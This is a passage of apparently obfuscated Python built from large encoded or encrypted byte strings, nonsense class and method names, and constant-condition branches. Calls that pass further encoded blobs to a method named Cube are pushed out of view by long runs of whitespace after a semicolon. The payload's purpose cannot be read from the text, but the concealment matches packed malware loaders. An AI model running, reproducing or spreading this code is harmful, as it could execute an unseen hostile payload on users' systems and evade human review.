e7\xf3\xc8\xa76\'e\xb9\xa9\x86\x0c\xc6\xb2\x88\x98d\x98\xb16F\xdd*\xae\x97\xee\xde\xe2Z|\xb5\xc0z-\xce&.\xde\xa0I\xddn\xd2\xba\xae\xf06jz\xa9 \x8e\xf1\xbd\xd7\xd2\xc3X:\x12\x1a\xed\xf0S;\x85BB\xd6,PAY\xe5R\xa5\x816\xa9\xebm,\x00\xff4\xb0E\xc5\xe8T\xf0\xc1<\x1d\xc7:\xc8\x90c*E0\xa0\xf7\xee\xeds\x1eXb\xdd\x85\xb8\xb8\xb6R\xdc$c\xa0\x0eUef\xee\x05\xe1X\x16\x85\xa6\xe1,\x94a\xc4\x03eN-(\x9b\xf2G\xe0\xbb\xaa\x956\x06\xa5\x92\xa1?\xbd\xa3\x94\x8f\x013\xb4\xd5J\xf7*y\x1c\xbc\xe5\x9b\x14q\xf9sl\xfb\x9a\x8d_\xbe\xa1R\x1f\xa0;\xf0>\xdew\x90\xe1\xe2\x91\xec\xc6s>\xe0\xbc1\xa4y\xbb\xfc\xdc`\x83,\xb0G%\xc8\xf7\x96|\xa4\x8c\xf3\x95\xd2v8ZI\xc3(\x81g\x9aq4S\xebg\x93\xba\xdd\xc5\xeb\xadd\x13\xbaG=\xf3\xbe\xad\xdb\xf4\xa8\xcf\xc92\xfb\x8c\xcd\xd9\x17\xe9\x92,\x90\x12\x18\xa5\t]E\x1c\xc9*\xf9Z\xd7\xd5\xdd\x82\x1co\xa7\xa4\xdfi\x04\xfe\xff\x14\x82\x95\xa3\xd4\x9cT\xca\xe9\x1e\xfc\xe5\xcf\xacg@\xd4[.X\xd1G>M\x8d\x01\x8b\x8c|Q\xb4\x94\xcf.Q,\xfbr\xc9\xd40\xb4\xd5\xce?\x90$\x0e\x9b/\x9d@\xb2\xc1\xe7\xca7\xb0\xae^C<\xf5\xc1!\xea\x96\x9bob\xce\x8f\xe4\x98<)7Rj\xe54y\xed\xbc\xc3\x94/\xd8\xc8X\x9c\x14\xa55t\xf0\x95]\x9d,\xf7X\x0bn\xe7\x93\xd4^\x19\xc4Zd\x0c{S\x08\xf4\x11\x0b\x9e\xd6\xfd\xcc\xc2hc\x194@\x193\xc6\xe4\xaa\x10\xa1[\xa0\x0cZ+\xf5pw\x0bD\x15\x92l\x1a\xe0Q@\x0b\x0f\x90\xae\xb4T\xda\xb4\x07\xf0\xef@\xbb\xa7\xb3\xa7\xf8\xe2Z\xe9~z\x94\xe4\x8e\t\xd4R)\xe6\'\xc9c\x92)\xc6\x81Mu\xb7\xe5\x9am)\xcdt\xc6\x8dx\xe42\xdbJ\x80U\xc3\x1b\x90\xa0!\x86\xa8\x89)U\x19(Hi\xbd\xb4\x9d\x99\xa6P\r/Q\x10\xe2\xae\xd66\xc5&u\xb7H@\xd3\xda\xbfDh\x88u\x9e%\xc0D\x1aA\xe1\x9eLs\xe8W\xea\xa5\xa3\xb0e\x82\xa1\xa5\x12\x92`f\n\xeblqq\x17~0}\xde\xf2M\xe4\x15~\xce%\x1c\x9e\x1e\x9cc]\x1a\x8d\x8e\xd8\x89\x8a\x08\x7f\xc2\xf67M\xf0\x95p\x06\xe5\x9e\xcd\xa3Lc\xaeV\xdan\xcc\xc9x\t\x13g\x97\x17\x1d\x82"\x90\xdc\x98\xdbTw\x0b\xb2\xce]Pi \xb6\xa5Qlt\xff\x00\x03\xf7#\xa4\x03\x80o\xda\xc2I%D\x0e\x15u\xde\xc6\x8d\x83\x05z\xed-\x12~\xe9\x1cS\xe6\x86^\xc6\x0f\xad\xb8\xbd\xfd\x90\xc8\xa1\x17\xa3\x83\xc1\xc9\xff\x8cu8X\x11w}$.r\xc5\xe6(\xa9\xc1\xc4\x101Kf\xadt\x7f\xf6\xc6\xf5\x012\xd7\xe4\xa4\xb5H\xcc\xc3\xf5\xa7\xa5\xb0\xcc\xfb!\x1e\xd3\x89S\x0b\xfb7\xb2\x7f\x03\x0ftc\x94s,m/J\x86\xecM&\xa7;\x99\x84}\xe8\x9d\x98q\x0bzr\x88"&e\xb6\xe8\xd5K\x1b\xef/\xc0\x11A\xec\xb1\x10\x8bH\x8c\xcb\xb5R\x0fzq\x84c0\xbd\xa3\x85\x1d\xec\xff\x05\xfa:k\xa5\xfb12v\x94\x99\xfb\xe0R\xddV26N\xe2zF\xc7\xce!Ua\xd2\xd2\x08\xb8B\x92w\x11:\x12K-e>l\x9b]Q]\xafa\x0c\xd2\x84\xbb\x82\x10\x14\x94`\xf78\xc0\x8dzYK\xf7\x00\x00u))\x03f\x88k\x9e\x1c\x0eb\x842\xa4X#\xb3Odc\x84*\xa5\r\xf7\x17\xe2\x04B{\x8d\xf0IA\xa3\xb5\xd2\xfdL-\xa2+,#.\x12\x03KX\xd1+\xd6\xd5\xdd\x87)\xb05V\x88L\xf7\x16`qI{\xf7\xb0\x8e\xfc58\xcc;J!t\xe4\xd0W\xf2r\xc0\xe8+\xa3\x8e\xe6\x11\xe4t\x85p\xa9\x1ez\xadSTY\xe1\xbd\xd76t\xea\xc8r08Z\x86\xa66\xbc\xb7i\x8e{\x1fX\x95*H\xc0mk\x90\x80\'L\xbfo\xd2\x94\xf2\xa5\xc8k\x1d\x15\xe1!X!KP3\x80\x0bk\x0b\n\xbc\x91N*\xc3\x96\x99\x89\xdf\xd83E8\x1f@\x17&\x9c7"\xb68\x9fRi;\xef\xab\x04\xd1H\xfeU\xf1\xaa\n*\xa2\xa8\xd0\xfa\xae\xab\xbb\x05\xefi\x9b\x08\xad\x04#\xb2\xee\xc1\xb0m$\xf3Q\x08\x0e\xca \x0bP\xe4\x8c\x90\x87\x8a\x8c\xa1\xf7Yn\xeb\x0c\x91\x7fs}]\xf3}4\xccz\x11\xcc1\x13s\xe1Pg\xcc\t\x1e\xd0<e>\xa7\xe5\xd2,\x03A-\x0bju\x03L\xea;\n\xc1\xe4>P{\xcd\xd7\x9c\x01\x98\xc2 \x17i\x92\xc6H/\x90\x03@\x81\xd2\x03\xa7\x89\xd9G\x1a\x8d\xd30\x8aJ\xe7\xd8\xae\xeb\x07\x8b`\xb1\xb8\xbaZ\\\x05\xe6\xff*\x08\xcc\xe7\xe0\xcaK_\x0eP\xbc\x8b\xef\xc0O\x07\xa2^\x8f\xfd\x85\x95\xd2C\x97\x140Wl\x0f\xf4A\xc83S\x99_\xc30\xc0\x8c\x9f#\xc0+\xc3\xf7\xde\xb8L\x07Z\x13)\xd9a\x94\x8e\xd2=6\x00\x91\x01\xc3{s\xa9\x01\xe0\x04\xd2\xc2|\x1e\xe6@I\x1c\x18\xfd\xd8l\x0f\x00\x08\xac!MAk@\xb0\xc5\x9a\xb0\xa0\xca\xaf\x7fE\xdb\xa7\xff\xb5l\x15\n\xc9\xa1\x8e\x1c\x1e\xa9\x8cM\x8a=x\xda\xda2\x13\x89\xb1.,\x05\xcd\x1c\x82\x97\x03\x1c^\x05#\xfe\t\xf9\x9f\xa2\xadoIi\xc3\x8e\x1a#\xd1\x06a\x0e(-k\x84\xfb\xab\x95\xbe\xa9T\xd2\xe5\xcc\xbb\xd1\xf2N9\xec\xc1n\x81\xe1\xc5`\xb3\xe8\xf7/\x0e\xe1\xf6\xaf\xb1\x15N2\x80\x16\x1am\xc2\xad\xec\t8\xd2\x13\x00\xe9\xa6IB\xee\xaf\x08\xd7z\xfa\xceO\xd4\xed\xc0\xba\xd3\xab\x849\xe2r\x97\x18\xc7\xa2%\xa1ak\x1d?R\x12\xa4\x84s\x0b\xbdd \xc0\t%\x85n\xaa\xdb\x94\x86r\x97\x8c\\\x03e\x16\xac/\xbb#\x0fN\x90\x8e\x98U\x8d\xa0w\xb5\x08\x8c\xa8g$<#\xe9-<\x88y+\xe1L\x82x\x91\xa7\xce \x15(\x15\xa3I]\xaf\xa9\x15\xba\x03c_\x87\x12\xdby}m\xe9[voEa\\\x95\x90/I,\x9e\'\xf5!\xd2\xa4n\xc3!\xb2}\x82 \xc6Rg\x90\x80\x01\x92\x06\x84\xc0\xc0\x16\x83\x88\\\x98\x921\xa6\x88\xeau\x84V\x01\xdd\x85T\x16xP\xf76\xaa\xcc\xa2Y\xcf~\x0b\x1b\x93_\xc2\x1b\xa6\xb5YB\x9e\x9d\xd5\xb6;\x87"\x01\x16i\xd8A\xe6M\xca\xb8I($\xce\xbe\xd9\x82M\xc4\xf7\x92\x0f\t?\xa2<\x02\x0e\xbd(\n\xd3\x14\x98\xbf\xa2^\x04ye\xc7\xc0\xaa\x97\xa6\xc0i\x18\x15\x98\x94\xc3t\xae\x14b\x0ez\x11\xf0\xe9\xf5"#0 OU\xeb\xb4\xbe+P/\x93\x12\xf9\xd6\xd2$\xef\x82\x8by+U\x11\x00l\x90b1h\xaf(\xae\xa4\xae\xd0\xf0\x1f\xf7I5\xc0a[\'\xe7|T8\x019\x0b\xdc\xde\xc2\x91\x1f2\xa8&F:\xd6\x94\x1d\xf9\x95\xd2\xc6\xfb#$\x1f\x00\x10\n2A\xe2\xfej\xa5{w\xf6\xbfU\xbe\xfbW\tg\x90\x08\x87-\x92\x9do\xa3\xa6\xa5\x1c\xdcI\xc62\xcc\x16\xf2\x11\x025k\xa5\x07\x0f\xc9\xd8\x01\t\xe4)\x97ZQb\x15uj\x91\'>\xd1.\xf1\xf1\x98\xba\x0b\xad\xb7\xf8\xbe8\\\xb9\xc71\x17$\x8e\x01S`\xf1\xd6\x9d\xae\x94\x80\xcdu\xbbO7\xbb"&OSU\xb9\xd7\x03\xd5\xf2V\xe0\xd2\xb3\x12\xa7\x9cc\x9a\xcbK\xbcsmDB\xb1_\x91\xd5\x8b2\x9d\'\xb8,\x04\x18r\xa1J=L\x8c~\xeav\x8eC\xdb\xda\xb9*\xa1\xe3e\xe67\xe79\xd6\xdf{p\xb2\xb6\x06\x99|\x86\xb4\x82\x90k\xf03LO0IAI3\xe6\xe3\xbd\xa2L\xf6#p\xf8')

        if 390823 > 6626382:
            _square(_system = 28842 / -28794)._cube(While = -28158 - Invert._run)
        elif 286385 < 7557253:
            Invert._invert(Builtins = Invert._run / -45093)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='iijljljiliijilliiijlji',Statistics=b'\xe12S\xe6\xa8\xc2\x9a\xa8\xf4\x96`\xd8< \xd6\xf2\xcc\x07\xb9\x97"(QLf1\xe7J\xf7\x91\x0f\x1d\xb9lr\xd4P \x81k\x1e\x06Y\x84:\xca\xd8\xcc\xc8A\x86\xb4\xf8\xe8\xcf\r\xd2h\x14\rL\x19\xd42[a:\xf1C\xdfFQ\xbf\xf0\')\x9dR\x15\x01\x0c\xe5\xdd\x0f\xf7\xb4\x03\xfe)\x97\xcf\x19\xde\xda\x19\xbc$H.N\xca\x01sb\xff\r\x94\xc1k]]\x94\x1e\x0e;\x0b\x94\xc5\xa7\x87\xd7\x16\xab\xde\x86\xf3\xacKO\x17x\xe9\x13\x0c\x9b\x0cx\x1d\x07$xQ/=\xdc\xb9z]\xd3\x83\x93\t\xff\xe0q\xde\xd4\xc1\x04(\xd6\x84\xf1\xaf\t\x06<\xc7\xe8\xb0\x8b\xea\xa5M\x97;\xd4\x9f{\x0c\xea\x07\x14,\x85!\xd7J\x1b\xee\xaf@\xd1\x0bD.\x8av-\x10>\x14\xe0\xa7R\xe9\xc1z\xd2\xdb!d\xf7\x95{\xd5\x19*)5\xd2\x9eXW\xf6\x91\x16\xc7LE\xa3\x10\\\x99\xf7H\xc7gZ1\x0c\xa3A:\xc9\x80\x13b\x04\xdfq\xec\xe9}\x16\xb2#3\x04\x9e\x08\x8fq\xc2\xc2\xb2\xaf\xc9Z\x9dS\x935\xf9\xee\xb53\xcdt\xd76\xaa\xfd\xab\xf0O\x11\xfb\xd4~\xbaK\x9e\xb8,\xe5U\x8al\xe1Y\xcf\xd5z\xba\xa9\xee\x16\xa9^\xdfhM]\xe1\x15\x97P\xf3\xc2v\x19\xed\x13\xef>\x0f\x93\xcd\x8f,-)\x92\x89\r\x17P-\xdf\xacn\xf7\xe1.\xcb\x12\x02Z*\xddR\x89\x97D\x81\x9d\'i;\xea_\xf4\x111\x82i5\x91\xa0\xbe\xe9\xb4\x9c1\x83H\x8e|"!\x9b\xb7\xf3z\xa9\x07\xdbDh\x96w\xc4\x0cq\xbeABIF\xf5\xd2\xfd\xcc\x19\x128\xdfS\xef2\x17Hn[m\xb5\xdbTwG&\x92\xfd\xdb-\x1cG\x91$d\x81\xe7\xe1\x01\xaf\xc4\xab/fR\xad\x08Y\xf6\x83\n|{]]\xdf\xe6\x8f\x98\x82)\x93,NJ\xdc\xf5I\x00\x90\xd9,\x8a\x99:\xbc[\x9c\xc0R_\xb9$\x9d\xceK[e\x0fz\xf7\tb<Zy\xb3\x12\xeb\x88\xce\x1dR\xcf,\xe2\x81\x87\xa4\x1b5\x98C\x85DBb1\xe9\xf0\xac\xc0\x02H\x925YhE\x04jS$\x8e\xfe\xa7I\xdd-\xe8\x7fv\x82\x9d\x84I\x9c\x1b\xc1\xdc\x0c,x\x05tBKd\xaeKI\x15\x12Jw\x9f\xb6\x8a\x03!\x85\xb5\x9ey\xb9\xdcyc\xd2\xd4m\xbaj\xc2\t\x88sv\xa1\x80\x16\x9fV\xcb\xf6\xb3\xde\xe4\x95\xee[$\x8e|\xdc\xa2\xcc*J\xc4\xba\xba[(\x11-\x98x<\xa5\x9f(\xa7\xd4\xae\xfe\xb1\xdc\xec\xc3N\xdd9\xe7\xfaRM\xc92\x85\xc7\xd6\x14/\xb4\xdaL\xb4\xcd&\xf9\x83v\x92\xaf\x01\x05it\xd4xi\x89\x076\xa0\x10\xa2\x82\xbaw\x98\x08\x19\xbar\x94\xb8\xfb$n\x93\xee\xefT\x96\xa18\x03\xb6!\x0c{JG\x08ow\xd6\xa2\x96\xc1i\x10\x97\xc6\xf1i\x80\xec\\\x00\xc4\x13>\x1e\x82]|\x15\xf2\x8b\xf9\x85\x91Y\x1834%)\x07\x04`\xe9=\xa2\x8bC\xf3]\x84\xc1}\t\xc8\xc3\xfe\x92n\xad\x8a\xfd\x91\xef;\xef\x12q\x0f\x12K\'@1\xd2A\xf48\xc5\xe1\x92;\x89c\xc9\x9bI\x83+\xd5%\x8d,\x91\xac\x0e\xa2\x0e\xe9L\x10M\xeaz\x0bD/0\x0e?\xc4H|\xf8\x83G\x811\xfa\xbd\xc8\xc3\x84\xb8,7f\xe5\xe1M!\xd2\xc1\x94\xe5y\xbf\xe3`J\xe0?\x81T\x9a\x10C\x04\xf9\n\x89\x06\xa5\xa9\xb3g\x1b\x81-\xbb\x03H^\xc6\x11\xda`7"\x0bR\xad\xf4\xe0\x1d/;\xc4f#\xe0\xbf\xed\xc4\xffj)\x89\xc9\xf4B)\xffvo\x02\x19\xc8B\xf2/\xb6\x0f\xb1\x87\xe8$\xa4M\xeav\x91x;\xd8\xaf\xfbgCN\xb2\xeb0\xb4\xfa\xd1u\xe3 \xcb\xed\xc6E\xccvL\xc2\x83\x15h\xdbL\xaae\xedfwm\x85\x14>dI-\x10W\x8ca\x9b\xeaz6\x865E\xc8GH\xc6\x1eai>\x8a\x86\x03\xb30\xf8\xc1\xca\x0f\x98\xb0K\x80\xb0\xf2y\xa0\xbc&#\xb7\xf5\xd73\x8e\xe5\xc9\xea\xf4\xba\n$\xd9\xfd\x85\x1dx\x82\xcfJ\x13dUk\xa1+\xf1\xde4\x07\xc5M]f\x8b-\x07\x92\x8c\xd3rV\xd4\xee}b\xe4|\xc7\x80\xb1\x82\xd8\x07\x13\x803\x94\x0c\xe3\xda\xe9n&\xac0\x1b\xb3\xc3>Bu\x0c\xdd\xf5Q/k\x0bqx@{\x1b\xbc\xa0\xbd\xed\xe1\x01-o\xd3\x87C\xd5\xc3,\'\xbe\xce\xe8#\x01\xa42\xd7\xa7j-\xd8\\\xb7e\x84\x08\xc5\x86\xfc\xb4)\xbf\xda\x99\x9e5\xd0\xad\xca(O9\xaf\x9d\xe9yS]?\x91\xa0\xd6\xec\'&\xc04q\x01\xa8=1\x0b\xaa\xa4\x9b\x9b\xebv\x8f\xf8\x1f/\xb5\xfe\x8c+#\xdc\xc7\xd8\xde\x9f\xda\xb3\xc2\xdd?)\x9b)\x15\x03\xe9\xd8\x97\x8b\xdfW\x8cc\xf9^\x95\x99\xbd\xdb\xd8_\xf7\xaexm\xe6B\t\x95\x84\x8e\xc1\xe5\xadb\xca\xb5v#\xa6\r\t\xb2\xb1\x89/\xd5\x10\xddT\xd7WL9\x0f\x10\\\xf7\x85J\xdd|N\x110b\x16F#7\x8e2\xf3\x8d\x0c\xaa\x96\x8b\xdd\x15\xf2#\x04\x1cM\x0eT\t-\xec\x8d\x89j3\x99\x8duYP\xd1<7\xd5\xdd\xaf\xe6\xd9\t\xb3\x87\xcc\xecb5\x93\x18.\x8b.\xab\xac\xc3\xeb\xean\xe30Zw\x8f\xc1\x12D\xf0 \xd8@\xe4\xef\xc5\xf9~\xcc12Z$\x03\x9e\x18\x16\x85\xe7"Wjj\x93\xba\x9d\xb1\xf2\x1f\x8e=\x823SI\xc20\x96\x9dZ\xd8\x7f\xbc\xd3\xee\xa7(\x9c\x8b\x90\x8eD?\xb0\rt\x810G\xb5\xc6E\x80k\xf9\xd1\x9e\x13\xc5\x817\xccZ\xfd&\r\xd2:\x94\x04\xdd\xfb\xec\xe3\x9f\xa2\xbe\x01\x7f\xd3\xd9!\xa7\xbc\x00R\x9d\x05\xf8\xab\x16H\xa7\xb8\x00_\xd5b\xd5\xfe\'Q\xd2.`\x84\xe3E\x08\xcd@\xc2\xc1\x16v;\xc2\x13\x12\x96\x11\xec\xd5\x19\xda\xe2*e\xedD\x0b\xb1\xa7E\x95\t\xcc\xa6\xffT\xa2\xc5\xa6\xba>A\xee\x98d\xa2}n\x16\xc9\xc9"\tZ\xfa\x8d\xd3\xb3l\x97a\xa2\xc0\xd0\x12\xcap\x07\xc4\r\x10t\xd2\xab\x976\xdc\x1f\xfc\x0eP\xad\x94\xe3.\xe2\xdcw\xc1]Q-\xfd\xcb\xf8\x1f\n#&\xb6\x15\x011\xc1N\x9f\x13aI`\xc7\xe1\xce\xb6\x9d\xd2\x8d`\x07\xa6T\xc2\x96\x85\xa7y2\xe1\x95&\x0b+\xec*\xfd^\xc3\x81z\xcad\xb1\xa9n\x17Bp~G\xc9\xa8\x03\x1c6\x85\rj\xab\x95\x1e\x84H\xb4\x02\xc6R6ZLJfI.}#b\x9f\x04\x89\x8bAW\xeb\x80\x01v&<P4,i\xb31z.D\x97k\x8a$\xc3\x98]\xe2#\xe5\xa5\xab\x94\xee\xef>\xef\xbcH\xe5\xad\x077\x93\xd3XL{\x1b\xa1\xda?\x94&\x03\xf3\xff8-\xbc\xe4\xdd)\\\xd2m\x01\xc3\xe8\x92f$\x1f\xb3\xc1\xe3p<xO\xb6]\x0e\x16p\x14@?O\xed\xb9\x90\xb1F\xa2{\xe1\xac\xb6\x8f\xf2\x1f\xd8,4\x14\xdd/\xfc\xcf\x85\xcaV\xe3\xb6\xbb\x87\xf6D#\x8f\xa6\xc8I\xbc,\xf5Q)-\x92\x07\x9a\xaez2\xf8\x8e\x80\xec\xc8[\x8bH\x93>\x82N\xd0\xd2\xd0\x82\xba\xd67/a\xc3Y=`\x82\xfb\xf6s\xba\xa8\xb2sTk\xe7\xf4\xd2\x90\xd3\xccs\x0b\x11\xc5YqG\xc9K)\xe8\x1a\xa4\xec\xb8^z\x10\xc2\xc1\x11\x80#\x91\xc8\x1f\t1\xd1fy\xc0\x10IL\x84\n\x18\xb7\x18\xf9l\x02\xcc?\xd3\xe3\x92\xb4-\\\xfb\xe8\x9c\x82\xf8\xc1\xac\x87\xe9\xae\xce\x1b\x07\xf4\xe7(\xf2\xa1\xb6\x83\x11~\x14\xd0_\xd4K\xdb\xdbC\xc5\xb0\'\xbe\xc6(\xa9\x9b\x83\x9b\xd4\xf5\'rX\x8b\xbf\x98`5\x17\xafPt\xc5\x15\xef\xc0\xba\xbaM\xb2\xedn\xcc~\xda\xb7j\tj\xda\x870[\xac\xe8\xe4\xc3\xb6\xac\x8fsk\xef\xb3[\x8d\xfbq\xc4\x19\'c\xec\xaf\x01\x86\x8c\x14\xf5\xd2\xc3\x16y}\xe7.*\xd1\x0b\t\xc9\x10\xa3\xe6\xe5\xd3\x81b\x9c\x8eh\xe7\xb0W:\x08\xbd5\xcd\x89\x91q\x9e=b*\x81E-D\x80j\xad\xb4\xb1Q*G\xf8^\x84\x10W\x08Q&\xe6\x92Zi\xc3\xfdQ\xc0s\x0f\xc3\x9d)\xf0:\xc4\xe5\xb7V\xba\x1f\'V\x9b\xf4\x06;u\xfc\xa4\x13^\x12\xe9!\xbc\xf3K\xea,MS\xfc\xb5l3A\x9b\x08qc\xaaV\x84@>\xf3\xea\xd1\xa4\xae?\xd6w+\xef\xf8@\x98h\xd6\xe5\n\xe3rk|\xc2\x8a\xf8\x0b\xed\x16\x07.3\x15t\xad\xbfK\xd0\x8d\x0e\x18\x13\x98]\x93\x88J\xfd\x07^\xcb\\\xeb\x08\xde,\xdd\x1b\xcf\xba\xa9\xc4\x98qD\x93\xaf\xf82\xc6\x130T\x0eH\'B\xfc\x04\xe9\xb9<\xe5\xe1\xd1\xbc\xa2\x9aoT\x9b\x1e\xfe\xcd\xb0F5\x14\xa9f\x1e\xcd*\xdf\xe2_\xf7C\x02\xdaw\x18\'\xe6\xaa\x8b\xb8\x97\x84\xb1\x0f\xce\xc2\x91\xcd\x0b2bCLa3\x83\x14\xd6t\xd3}v\x10\xb9\xb8$2\xef\x89yx\xb9\xbc\n\xbcJ\xbfzdQ\x1f\x860]M\xb2\x00&%\x80\xb2BI\xc66\x88\xee\xf8\xa6\x8e\x16\xc0\xa0\xfc\x19\x08J\xaf\x90\x9f\x148K\xf7\xb3L\n\x94*P\x8aR\xc0\xca\x94(T\x89bX\xd9T\xb7i\xe6\x9b\x9d|\xfa\xfb"T#\xeaH\x97G\x17\xb7\xdbA\xb0t\xdaf\xf1$\xf5\x94\xa8\x11(\x08\xd6\xba\xba\x18\x04\xe4+uJf\xc6\xee\xbd\x19\xc1-\x11\xfeG\x96\x82\x93\xa2\'9\x9bi\xc3\x0e-9\xb8\x01\x08\xd0#\x0f\xc9G\xe0\x98\xaf\x956\xdc\x1f\x01\n24\x9aE\x94\xc2\xec#P\x1a\xd5J\x1b\xfbs038\xf2\x17b\xc0\x10\xf3!\xd4Jw\xef0\xa9\x1a\\Z\x0e\x15\xe4U\xa4:\xcc\xa6\xbaa\xf3\x0e\xd3Ng\xc0\x94\xa2\xbe\x92\x89-\xe3\x9d.\xf3Q{`\x9f\xde_\x9eM\xa6\x9d\xb9\x11\xd6\xda\xa6\xa3e-5L\xae\xa6\r\x1dH\xacI\xb3\x9a\xd4mH\x9a\xb5\x93G\xd1\x1f\xd1\x1e\n\xf3f(\xd0SH\x8b\x15\x89\x04R\x18\xc7\xf8\xde\xb9\x8b:\x19\xc60\x0c\x02\xe0t\x1e\xa5\xc3\x008\x9c\x8d\x98\x14\xc06\xba2 \xb8Z"\xeb\x8c\xc8i\xb6\x81\xcby\x04\x9c\xceIK~\x86\xa3)\xc4\xc9 \x1f\xcd\xc3t\x86D5\x0f\x0f\xd3\x835T\x86i\xe4\xba\x81\x17n\x8a\xb1r\xe2\x95\xff')

        if 222593 > 8166682:
            _square(_system = 68038 - 30590)._cube(While = 6895 - Invert._run)
        elif 109431 < 5803193:
            Invert._invert(Builtins = Invert._run / 48674)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='xwxwxxxxxxwwxxxwxwwxxx',Statistics=b'\x14\xad`\xe7]\xa0\xab<[G\x0f\x0fH-\x04\xb7\xf3a6\x9d\xceZ\xdcJ\xcf1O\xdb\xec~\xadg\x0e\x8e9g\x9bsc\xb3\xf3_\x13f\xfa\x85Mcl?\x85\xbdw\x0e0%\x83|\x8c\x80\xba\x10\xa5\x9d\x10Sc\x14\xf5\xd2\xdd[Z\xb3\xf9Us\xff\xc5\xf2\xbe\x84.}U\xdd&\xde\x9a\x16\xf2J\xeb\xa9\xe6h\n\xa3q\n\xa8`\x80\x05Oah\xce`\xb3\xb1\t\x9c\xfczh\x96F\xa3r\x81&\xf0Z\xe9\x9e1\xc4[\x0e\x80\xc8G\xe6\xd8\x91\xca\x0c[T\xc8\x95u\xdeX\x8e\x0f\xef~\xf9\x8e\x91\xe0*I\'\x88#\xeb\xa5E\xdb\xbe\x02=cF\xc1\xabS\x02\x96?\xb4\x9a\xc9#5R$\x11\xad\xa8\x8d6xQ\xb9q\xd7\xd5\xcd<\xaa\x94\x1e#\xea#\xa7\r\xd4\xf3\xd4\x94\xb3\xd5\xd0\x96\x0f3.\xa4Q\x0cSH\xbe8H\xc7Y\x91E\xe6\xf3$\xca\xcd\'\xe0G\x03c\xf8(k\xbbD\\\xd2!\xbf\\\xba\x8d\xe6N\x14Vo\xc9\xe7\x8a\x1c\x17\xe6\x07a\xbd\xb4\x1d\xd2^g\xc6\x92.%\xd6"mAjR\xd7\xa7\x05i\x8fd?W\xf4\xc0\xe4\xb0W\xf8D\xf2\xb0\x16\xb0\x181\x05\x15\x89\xcb\xa2[\x85f\xf4\x94U`S]o\xb1H\xe4\xee\x19S\x04\x92\'&~Y\x0e\xdc\x820(-\x11m\x13\x8agh\x1f*\xcc\x00\tq\x80\xa4h5ZR\xda\xcd\xc0\x11)H\xcc\xab\xce\xd4W\x1f8\xab\xea6\xf5P\xae\x9fk\xf8\x04\x9dP\xfa\xa5\xb1L\xfa&\xeac%\xf4\xa0\xdd:\xcd\x99o\x08"Ko\x8d\xad\x8c!\xd3\xb3\x83T\r=$A+c\xad\xb4\xb1x\x98"f!\xe0\xf0\x17\xb22\xe6\xf5\xd2\xc6\x88\x06bq\xed!n\x01\xb6\x8a\x8f\x94\x83\xb5R\xbaWqs\xf70\x1b4\x17d)\xf9L\xd1Y<&\xd3\x1cL\xf0\xc0\xe6\xd2>\xe7\xed\x9cTP~\xc2v\xe7.\x19\x08\x83\xcb1\x06 \xe69%\xe2@\xb8Z\xe9\xfe\xdcA=5\xcfhn\xf6$)\xbb\x82\xd6\xd5\xdbb\x11\xdf\xdd\x1d\xd4V\xb0B\xa0|\xfd\xa5YD\xc2_!}NwF(n\x1e\x95\x8b\xe0\xd5O\x8e\xe17Sd\xdb\xfb-("\xd6\x12c\\\xd3\xa3\x15A\x86\x88pB\xc0\xa0\xa9\x01\xc5\xeb\xaa\xe3\xd66\xd5\xf5\x94\\\xd7#\x80\x89\xcc\xf4\x0e\x9f#&{1\xee\xd3\x1f\x99\xf9;V\xf0\xac\x86"f)\x11\xb8D\xa1\xd6\xdc\x11\xcd\xeav\xde<K\x00-\x8e,\xcd%]h\x9b\\w\xa5\xcb\xaf\xed\x14\xdc\xdf\tP\xbd\xd7\x14\';\x82/\xb7oM\xa0\x93\x03O\x88\x07~\xbd\n\x8bn\x95cW\xb6\xba\xef"q\x1e\xf7\xe0\xe91\xddH\xbe\xe4/\xab\x01\xbc\xda\xa5\x96\xa6L\x86\xb9\x95\xca\x124\xa3P&\xc3Ric\xa9/ay;@\xcc@\x812_\xa5\xcc\xc3P\x00\x14E\x88\xd8\xea\x0cq\n\xa4ST\xca\x1ak\x14\x16\xc6\x8f\xc1H1\xee-\xae\x97n\xd1&\x05J\xbb\x10\xf9\x0ch\x8a\x88[\xa5R\xda\x0e\x88\x93W\x96H\xd1\xa6-\xd1\x8f\x02\xe2l\xaa\xbb\x05&\xb8\xf6\\\xeb\x14\xba\x14\xd0\xb4\xbe\x04\x1f\x8e\xa1\x02\xa1*\t\xba\x80H\xa5\x8c\xb0c\x07\xd8%TicpLxG`\xfc\x02oV\x8e\x03%\xad\x97\x1e\xde</4G\xda&\x99\xa9\x1b\x0f\xe5\xa9Z\xed7\xd5\xdd2\xa3N+gV\x1c"\x92\xa0\x07\x0e\x0b@P\x03\xc6\xa0\xe8\x91\xfb\xc2e\x91\x8ec\n\xa3\xa4<\xd2I<\x8a\x06@d\x1a\xc4\xc34O\xef\x99\xe5\x17\xf6\x10\x8d\x92\x01\x97\x8f\xa2aL\xf5\xc3<\x03\xd2\xd3IX\x00\xe0\xb1\xd5\xaa\x1f\x04\x90K\x01\x82\x04\x91\xa7\x86\x18k\xda\x90\x9c\t=v\xa0\x06i\x91T\xf8\x1c\xd5\xbd\xdbT\xb7!\xcbW\'\xf1\xbe@\xd5\xd4>\xbe\xe8H\x98_\xfa$G\xb5a\xcb\x10g\xd1\xb2\xa49\xd2Rz$l\xaa\xdbp$\xec\x06 jk\xe8\xb9\x91|_\x92\x0f\xb5\xb1g%\xc2\xa5?bsp\x0f\x17\xf1\xb0^z\xd8j/\xd0\x17\xa7`@\xbbO\xee\xbb4\xdc\x1f}\xe1E\x0c-\xc9\xf0lg(\xd7\xe19\x12\xd4)}M\x1b\xa6\x9a\xd4\xf5F\x13\xd9I\xd8\xd4J\x97Ga\x1d\x1f\x85\xfd<P\xfc\x11\x9e\xbc\xe10i\t\x93J\xf7\x17fS<\xa9\xd4N\xb1N\x1a\xd4\xf9\xe5\xb4\xcf\xcd\xc9|\x80\xaf6IDSC\xd8JW\xbeDT\x0b\xfb\xb3\xacQ\xc2J\xa6\x99\xa27\xd5\xf55\xdb\xfa\x8e\x86]\x92/\xb2J\x91\x9fy\x8c\xd1\xe9\x94\xc2\xea\x92\x8f\x80.{\xd8<T\xffY\x89BW,\x85\xdav\x95\xa8\xde\xd7\xa4n\x93\xde\xb7\xc1 